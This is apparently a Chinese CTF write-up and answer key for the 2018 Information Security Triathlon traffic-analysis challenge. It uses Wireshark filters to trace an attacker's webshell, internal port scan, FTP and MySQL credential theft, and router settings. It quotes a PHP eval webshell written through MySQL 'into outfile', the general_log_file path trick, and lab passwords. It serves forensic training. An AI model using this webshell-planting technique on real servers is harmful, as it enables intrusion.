信息安全 数据赛 铁人三项_2018.5.18信息安全铁人三项赛数据赛题解
本文原創作者:一葉飄零
目錄
題目描述
第一個數據包
第三個數據包
第四個數據包
路由器hacking
后記
題目描述
1.黑客的IP是多少
2.服務器1.99的web服務器使用的CMS及其版本號(請直接復制)
3.服務器拿到的webshell的網址(請輸入url解碼后的網址)
4.服務器1.99的主機名
5.網站根目錄的絕對路徑(注意最后加斜杠)
6.黑客上傳的第一個文件名稱是什么
7.黑客進行內網掃描,掃描的端口都有哪些(端口從小到大,用英文逗號分隔)
8.服務器2.88的ftp服務賬號密碼(格式:賬號/密碼)
9.黑客成功登陸ftp的時間(格式:10:15:36)
10.黑客在ftp中下載的敏感文件名稱是什么
11.服務器2.88中用戶名為admin_zz的web后臺管理員的密碼
12.服務器2.88的mysql賬號密碼(格式:賬號/密碼)
13.服務器2.88的mysql服務中有和admin有關的三個表,請按照黑客的查詢順序作答,使用空格分隔
14.請列出黑客設置的genreal log的絕對路徑(將路徑復制出來,區分大小寫)
15.路由器的品牌、型號、版本(請直接復制粘貼)
16.列出路由器的所有IP地址(格式:從小到大,用英文逗號分隔)
17.在路由器的端口監控中,監控端口和被監控端口分別是多少,例,1號端口監控2/3/4號端口:1-->2,3,4
18.路由器一共有幾個接口?其中有幾個WAN口啟用?有幾個LAN口啟用(格式:用英文逗號分隔)
19.路由器的系統路由表中一共有幾條?第三條的子網掩碼是多少。例: 255 255.255.0則為24 (格式:用英文逗號分隔)
20.路由器的5Gwif名稱是什么,信道是多少(格式:名稱信道)
題目文件:
密碼: shna
第一個數據包
上來先過濾http流量,隨意瀏覽
可以發現202.1.1.2執行了phpinfo()命令
無疑是黑客ip,而192.168.1.99顯然就是受害者了
我們進一步利用這一特點,進行過濾
(ip.addr == 202.1.1.2 || ip.addr == 192.168.1.99) && http
為確定服務器使用的CMS和版本號,我們抽取一個192.168.1.99的響應,看看前端響應里會不會包含
隨意跟蹤一個ip.src==192.168.1.99的http響應
我們定位到Powered by
不難發現
版本號和CMS一目了然
EasyTalk X2.0.1
同時利用
(ip.addr == 202.1.1.2 || ip.addr == 192.168.1.99) && http
過濾不難看出有如下url
解碼后得到
即可利用的webshell
隨后想起有phpinfo,即可以泄露大量服務器信息,我們去拷貝下響應的html源碼
保存到本地,打開即可看到許多信息
服務器1.99的主機名和網站根目錄的絕對路徑一目了然
答案分別為
simplefight1
/var/www/html/easytalk
接著既然要找出上傳文件,于是使用過濾
ip.addr == 202.1.1.2 && http.request.method == POST
不然找到如下信息
解碼z1查看文件名
/var/www/html/easytalk/scan.php
發現為scan.php
顧名思義,掃描,于是我們過濾這個文件,查看黑客的掃描
ip.addr == 202.1.1.2 && http contains "scan.php"
問題一目了然
可見起始ip:192.168.0.1
結束ip:192.168.3.255
掃描端口:21,80,8080,1433,3306
至此我們歸納一下答案
1.黑客的IP是多少
202.1.1.2
2.服務器1.99的web服務器使用的CMS及其版本號(請直接復制)
EasyTalk X2.0.1
3.服務器拿到的webshell的網址(請輸入url解碼后的網址)
4.服務器1.99的主機名
simplefight1
5.網站根目錄的絕對路徑(注意最后加斜杠)
/var/www/html/easytalk
6.黑客上傳的第一個文件名稱是什么
scan.php
7.黑客進行內網掃描,掃描的端口都有哪些(端口從小到大,用英文逗號分隔)
21,80,8080,1433,3306
第二個數據包
既然要找ftp的賬號密碼,肯定是利用之前打下的機子作為跳板,進一步攻擊內網
那么此時我們只需要過濾
ip.src == 192.168.1.99 && ftp
即可查看所有登錄信息
選中最后一項
不難看出賬戶密碼為:`administrator:123456`
然后再過濾
ip.addr == 192.168.1.99 && ftp
找到對應密碼為123456登錄的消息
可以看到登錄時間
14:07:15
可以發現黑客在第二個數據包里只進行了操作
CWD 改變工作目錄
PWD 打印工作目錄,返回主機的當前目錄
PASV 進入被動模式
LIST 如果指定了文件或目錄,返回其信息;否則返回當前工作目錄的信息
而下載命令為
RETR 傳輸文件副本
所以我們切換到第三個數據包中
第三個數據包
我們根據之前的分析,使用命令
ip.src == 192.168.1.99 && ftp contains "RETR"
即可一目了然
下載文件名為
/phpStudy/WWW/config/config_db.php
我們跟進查看一下,畢竟是重要配置文件
ip.addr == 192.168.1.99 && ftp-data
可以得到配置php
/*
con_db_host = "localhost"
con_db_id = "root"
con_db_pass= "S1mp13zz"
con_db_name = "met"
tablepre = "met_"
db_charset = "utf8";
*/
?>
即mysql賬號密碼:`localhost/S1mp13zz`
下面我們去尋找admin_zz的密碼
ip.addr == 192.168.1.99 && http contains "admin_zz"
答案同樣一目了然
密碼為`1q2w3e4r`
然后需要我們查找admin相關的表,但是我們知道,表前綴為:`met_`
所以我們可以過濾
ip.addr == 192.168.1.99 && mysql contains "met_"
結果依舊顯然,正好3個查詢,3個有關管理員的表也出現了
select * from met_admin_array
select * from met_admin_column
select * from met_admin_table
即
met_admin_array,met_admin_column,met_admin_table
我們來總結一下這個階段的答案
8.服務器2.88的ftp服務賬號密碼(格式:賬號/密碼)
administrator:123456
9.黑客成功登陸ftp的時間(格式:10:15:36)
14:07:15
10.黑客在ftp中下載的敏感文件名稱是什么
config_db.php
11.服務器2.88中用戶名為admin_zz的web后臺管理員的密碼
1q2w3e4r
12.服務器2.88的mysql賬號密碼(格式:賬號/密碼)
localhost/S1mp13zz
13.服務器2.88的mysql服務中有和admin有關的三個表,請按照黑客的查詢順序作答,使用空格分隔
met_admin_array met_admin_column met_admin_table
第四個數據包
我們直接過濾
ip.addr == 192.168.1.99 && mysql
不難發現,黑客想在192.168.2.88的機器上留shell
select '<?php eval($_POST[a]);?>' into outfile 'c:/phpStudy/WWW/aaa.php'
但是返回了錯誤
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
于是黑客進行了一系列的更改
在后續的一條操作中,可以明顯看到
set global general_log_file='c:/phpStudy/WWW/config/config.php'
路徑為
c:/phpStudy/WWW/config/config.php
同時可以確定192.168.2.88為一臺windows
路由器hacking
剩下的5個題均為路由器的題,這就很難受了,之前一直很少接觸路由器的流量分析
后來轉念一想,路由器一般都是192.168.0.1吧
于是我查了一下這個ip
ip.addr == 192.168.0.1 && http
發現的確是有web服務的
我們進行查找
很快,在第一個返回200的包里就找到了答案
{ "id":1, "result":{ "locale":"zh_CN", "force":false, "radio":2, "model":"TL-WAR1300L v1.0" }, "error_code":"0" }
答案為
TL-WAR1300L v1.0
我們系統的看一下這些流量,不難發現,黑客先進行了密碼爆破
而之前的登錄error_code均為700
可見最后黑客成功登入
然后黑客進行了read選項
才有了如上的版本信息
然后我們看到黑客進行了如下操作
然后得到回顯{
"id": 1,
"result": {
"normal": [{
"py_isup": false,
"ipaddr": "",
"t_type": "ethernet",
"t_isup": "disconnect",
"t_name": "WAN1",
"t_linktype": "dhcp"
},{
"py_isup": false,
"ipaddr": "",
"t_type": "ethernet",
"t_isup": "disconnect",
"t_name": "WAN2",
"t_linktype": "dhcp"
},{
"py_isup": false,
"ipaddr": "",
"dhcp_status": "on",
"t_type": "ethernet",
"t_name": "LAN1",
"t_isup": "disconnect",
"t_linktype": "static"
}, {
"py_isup": false,
"ipaddr": "",
"dhcp_status": "on",
"t_type": "ethernet",
"t_name": "LAN2",
"t_isup": "disconnect",
"t_linktype": "static"
}, {
"py_isup": false,
"ipaddr": "",
"dhcp_status": "on",
"t_type": "ethernet",
"t_name": "LAN3",
"t_isup": "disconnect",
"t_linktype": "static"
}]
},
"error_code": "0"
}
目前2個wan和2個LAN都是關閉狀態,`py_isup`清晰可見
接著后面又出現了一個類似的內容
{
"id":1,
"result":{
"normal":[
{
"py_isup":true,
"ipaddr":"202.1.1.1",
"t_type":"ethernet",
"t_isup":"connect",
"t_name":"WAN1",
"t_linktype":"static"
},
{
"py_isup":true,
"ipaddr":"192.168.12.173",
"t_type":"ethernet",
"t_isup":"internet",
"t_name":"WAN2",
"t_linktype":"dhcp"
},
{
"py_isup":true,
"ipaddr":"192.168.0.1",
"dhcp_status":"on",
"t_type":"ethernet",
"t_name":"LAN1",
"t_isup":"connect",
"t_linktype":"static"
},
{
"py_isup":true,
"ipaddr":"192.168.0.1",
"dhcp_status":"on",
"t_type":"ethernet",
"t_name":"LAN2",
"t_isup":"connect",
"t_linktype":"static"
},
{
"py_isup":false,
"ipaddr":"192.168.0.1",
"dhcp_status":"on",
"t_type":"ethernet",
"t_name":"LAN3",
"t_isup":"disconnect",
"t_linktype":"static"
}
]
},
"error_code":"0"
}
此時可以發現一共有5個接口,其中WAN1、WAN2、LAN1、LAN2均被打開
并且ip為:
202.1.1.1
192.168.12.173
192.168.0.1
故此16,18題均被解答
然后是子網掩碼的問題,這里我選擇搜索網關相關內容
ip.addr == 192.168.0.1 && http contains "gateway"
然后可以發現如下數據
{
"id":1,
"result":[
{
"metric":"0",
"gateway":"192.168.12.254",
"mask":"0.0.0.0",
"dest":"0.0.0.0",
"interface":"WAN2"
},
{
"metric":"0",
"gateway":"0.0.0.0",
"mask":"255.0.0.0",
"dest":"127.0.0.0",
"interface":"lo"
},
{
"metric":"0",
"gateway":"0.0.0.0",
"mask":"255.255.252.0",
"dest":"192.168.0.0",
"interface":"LAN"
},
{
"metric":"0",
"gateway":"0.0.0.0",
"mask":"255.255.255.0",
"dest":"192.168.12.0",
"interface":"WAN2"
},
{
"metric":"0",
"gateway":"0.0.0.0",
"mask":"255.255.255.0",
"dest":"202.1.1.0",
"interface":"WAN1"
}
],
"error_code":"0"
}
所以一共有5條,第三條為{
"metric":"0",
"gateway":"0.0.0.0",
"mask":"255.255.252.0",
"dest":"192.168.0.0",
"interface":"LAN"
}
子網掩碼為`255.255.252.0`
至此19題完結
然后最后問到信道,于是我的過濾為
ip.addr == 192.168.0.1 && http contains "channel"
得到數據{
"id":1,
"result":{
"1":{
"mssid":[
"test-ge1"
],
"wds":"off",
"channel":36,
"mode":"11anac mixed",
"radio_enable":"on",
"amount":0,
"frequency":"5G"
},
"0":{
"mssid":[
"test-ge1"
],
"wds":"off",
"channel":1,
"mode":"11bgn mixed",
"radio_enable":"on",
"amount":1,
"frequency":"2.4G"
},
"2":{
"mssid":[
"TP-LINK_GUEST_6258"
],
"amount":0,
"mode":"11bgn mixed",
"radio_enable":"off",
"frequency":"visitor"
}
},
"error_code":"0"
}
重點為"1":{
"mssid":[
"test-ge1"
],
"wds":"off",
"channel":36,
"mode":"11anac mixed",
"radio_enable":"on",
"amount":0,
"frequency":"5G"
}
可以清晰看到,名稱為`test-ge1`,信道為36
然后是最最蛇皮的17問:在路由器的端口監控中,監控端口和被監控端口分別是多少,例,1號端口監控2/3/4號端口:1-->2,3,4
這個我可以說相當薄弱了,并不是很懂,但是其中提及端口,于是我的關鍵詞為
ip.addr == 192.168.0.1 && http contains "port"
數據并不是很多,看到最后有
{ "id":1, "result":{ "state":"on", "mode":"both", "mirroredports":[ "1", "2" ], "mirrorport":"3" }, "error_code":"0" }
可以斷定答案為
3-->1,2
最后階段歸納一下答案
14.請列出黑客設置的genreal log的絕對路徑(將路徑復制出來,區分大小寫)
c:/phpStudy/WWW/config/config.php
15.路由器的品牌、型號、版本(請直接復制粘貼)
TL-WAR1300L v1.0
16.列出路由器的所有IP地址(格式:從小到大,用英文逗號分隔)
192.168.0.1,192.168.12.173,202.1.1.1
17.在路由器的端口監控中,監控端口和被監控端口分別是多少,例,1號端口監控2/3/4號端口:1-->2,3,4
3-->1,2
18.路由器一共有幾個接口?其中有幾個WAN口啟用?有幾個LAN口啟用(格式:用英文逗號分隔)
5,2,2
19.路由器的系統路由表中一共有幾條?第三條的子網掩碼是多少。例: 255 255.255.0則為24 (格式:用英文逗號分隔)
5,255.255.252.0
20.路由器的5Gwif名稱是什么,信道是多少(格式:名稱信道)
test-ge136
后記
最后完整答案為:
1.黑客的IP是多少
202.1.1.2
2.服務器1.99的web服務器使用的CMS及其版本號(請直接復制)
EasyTalk X2.0.1
3.服務器拿到的webshell的網址(請輸入url解碼后的網址)
4.服務器1.99的主機名
simplefight1
5.網站根目錄的絕對路徑(注意最后加斜杠)
/var/www/html/easytalk
6.黑客上傳的第一個文件名稱是什么
scan.php
7.黑客進行內網掃描,掃描的端口都有哪些(端口從小到大,用英文逗號分隔)
21,80,8080,1433,3306
8.服務器2.88的ftp服務賬號密碼(格式:賬號/密碼)
administrator:123456
9.黑客成功登陸ftp的時間(格式:10:15:36)
14:07:15
10.黑客在ftp中下載的敏感文件名稱是什么
config_db.php
11.服務器2.88中用戶名為admin_zz的web后臺管理員的密碼
1q2w3e4r
12.服務器2.88的mysql賬號密碼(格式:賬號/密碼)
localhost/S1mp13zz
13.服務器2.88的mysql服務中有和admin有關的三個表,請按照黑客的查詢順序作答,使用空格分隔
met_admin_array met_admin_column met_admin_table
14.請列出黑客設置的genreal log的絕對路徑(將路徑復制出來,區分大小寫)
c:/phpStudy/WWW/config/config.php
15.路由器的品牌、型號、版本(請直接復制粘貼)
TL-WAR1300L v1.0
16.列出路由器的所有IP地址(格式:從小到大,用英文逗號分隔)
192.168.0.1,192.168.12.173,202.1.1.1
17.在路由器的端口監控中,監控端口和被監控端口分別是多少,例,1號端口監控2/3/4號端口:1-->2,3,4
3-->1,2
18.路由器一共有幾個接口?其中有幾個WAN口啟用?有幾個LAN口啟用(格式:用英文逗號分隔)
5,2,2
19.路由器的系統路由表中一共有幾條?第三條的子網掩碼是多少。例: 255 255.255.0則為24 (格式:用英文逗號分隔)
5,255.255.252.0
20.路由器的5Gwif名稱是什么,信道是多少(格式:名稱信道)
test-ge136
沒想到最后竟然突然來了個路由器hacking,完全摸不到邊,純靠題目轉英文進行過濾……
最蛇皮的是最后2個包都沒用到,希望可以加強自身各種類型的流量分析的能力吧= =
(注:本文屬于合天原創投稿獎勵,未經允許,禁止轉載!)
總結
以上是生活随笔為你收集整理的信息安全 数据赛 铁人三项_2018.5.18信息安全铁人三项赛数据赛题解的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: UNI-APP安卓本地打包详细教程(保姆
- 下一篇: 饥荒服务器不显示管理员,饥荒联机版管理员